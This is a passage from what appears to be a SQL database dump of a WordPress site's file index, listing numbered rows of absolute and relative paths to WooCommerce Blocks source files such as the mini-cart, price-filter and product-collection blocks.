erce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/index.tsx'),(9085,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/test/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-checkout-button-block/test/block.tsx'),(9086,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/attributes.tsx'),(9087,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/block.json'),(9088,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/block.tsx'),(9089,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/constants.ts'),(9090,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/edit.tsx'),(9091,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/editor.scss'),(9092,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-footer-block/index.tsx'),(9093,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/block.json'),(9094,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/edit.tsx'),(9095,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/frontend.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/frontend.tsx'),(9096,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-items-block/index.tsx'),(9097,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/block.json'),(9098,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/block.tsx'),(9099,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/edit.tsx'),(9100,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-products-table-block/index.tsx'),(9101,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/attributes.tsx'),(9102,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/block.json'),(9103,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/block.tsx'),(9104,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/constants.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/constants.tsx'),(9105,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/edit.tsx'),(9106,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-shopping-button-block/index.tsx'),(9107,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/block.json'),(9108,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/block.tsx'),(9109,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/edit.tsx'),(9110,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-block/index.tsx'),(9111,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/block.json'),(9112,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/block.tsx'),(9113,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/edit.tsx'),(9114,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-items-counter-block/index.tsx'),(9115,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/attributes.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/attributes.tsx'),(9116,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/block.json'),(9117,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/block.tsx'),(9118,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/constants.ts'),(9119,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/edit.tsx'),(9120,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/mini-cart-title-label-block/index.tsx'),(9121,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/register-components.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/register-components.ts'),(9122,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks/utils.ts'),(9123,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks-style.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/mini-cart-contents/inner-blocks-style.tsx'),(9124,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/quantity-badge/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/quantity-badge/index.tsx'),(9125,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/quantity-badge/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/quantity-badge/style.scss'),(9126,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/style.scss'),(9127,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/test/block.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/test/block.js'),(9128,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/types.ts'),(9129,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/data.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/data.ts'),(9130,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/defaults.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/defaults.ts'),(9131,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/set-styles.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/set-styles.ts'),(9132,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/test/data.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/mini-cart/utils/test/data.ts'),(9133,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/attributes.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/attributes.ts'),(9134,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/block-wrapper.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/block-wrapper.tsx'),(9135,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/block.json'),(9136,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/block.tsx'),(9137,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/constants.ts'),(9138,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/deprecated.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/deprecated.tsx'),(9139,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/edit.tsx'),(9140,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/editor.scss'),(9141,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/frontend.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/frontend.ts'),(9142,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/index.tsx'),(9143,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/style.scss'),(9144,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/test/use-price-constraints.js','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/test/use-price-constraints.js'),(9145,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/types.ts'),(9146,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/use-price-constraints.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/use-price-constraints.ts'),(9147,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/utils.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/price-filter/utils.ts'),(9148,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/block.json'),(9149,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/block.tsx'),(9150,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/edit.tsx'),(9151,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/index.tsx'),(9152,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/inspector-controls.tsx'),(9153,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-best-sellers/types.ts'),(9154,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/block.json'),(9155,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/block.tsx'),(9156,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/edit.tsx'),(9157,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/editor.scss'),(9158,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/index.tsx'),(9159,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/style.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/style.scss'),(9160,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-categories/types.ts'),(9161,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/block.json'),(9162,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/block.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/block.tsx'),(9163,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/edit-mode.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/edit-mode.tsx'),(9164,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/edit.tsx'),(9165,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/editor.scss'),(9166,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/index.tsx'),(9167,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/inspector-controls.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/inspector-controls.tsx'),(9168,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/types.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-category/types.ts'),(9169,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/block.json','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/block.json'),(9170,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/constants.ts','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/constants.ts'),(9171,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/edit.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/edit.tsx'),(9172,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/editor.scss','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/editor.scss'),(9173,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/icon.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/icon.tsx'),(9174,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/index.tsx'),(9175,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/attributes-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/attributes-control.tsx'),(9176,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/author-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/author-control.tsx'),(9177,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/columns-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/columns-control.tsx'),(9178,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/display-layout-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/display-layout-control.tsx'),(9179,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/hand-picked-products-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/hand-picked-products-control.tsx'),(9180,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/index.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/index.tsx'),(9181,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/inherit-query-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/inherit-query-control.tsx'),(9182,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/keyword-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/keyword-control.tsx'),(9183,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/on-sale-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/on-sale-control.tsx'),(9184,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/order-by-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/order-by-control.tsx'),(9185,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/stock-status-control.tsx','wp-content/plugins/woocommerce/packages/woocommerce-blocks/assets/js/blocks/product-collection/inspector-controls/stock-status-control.tsx'),(9186,'/home/tummmyov/tummyrevolution.com/wp-content/plugins/woocommerce/package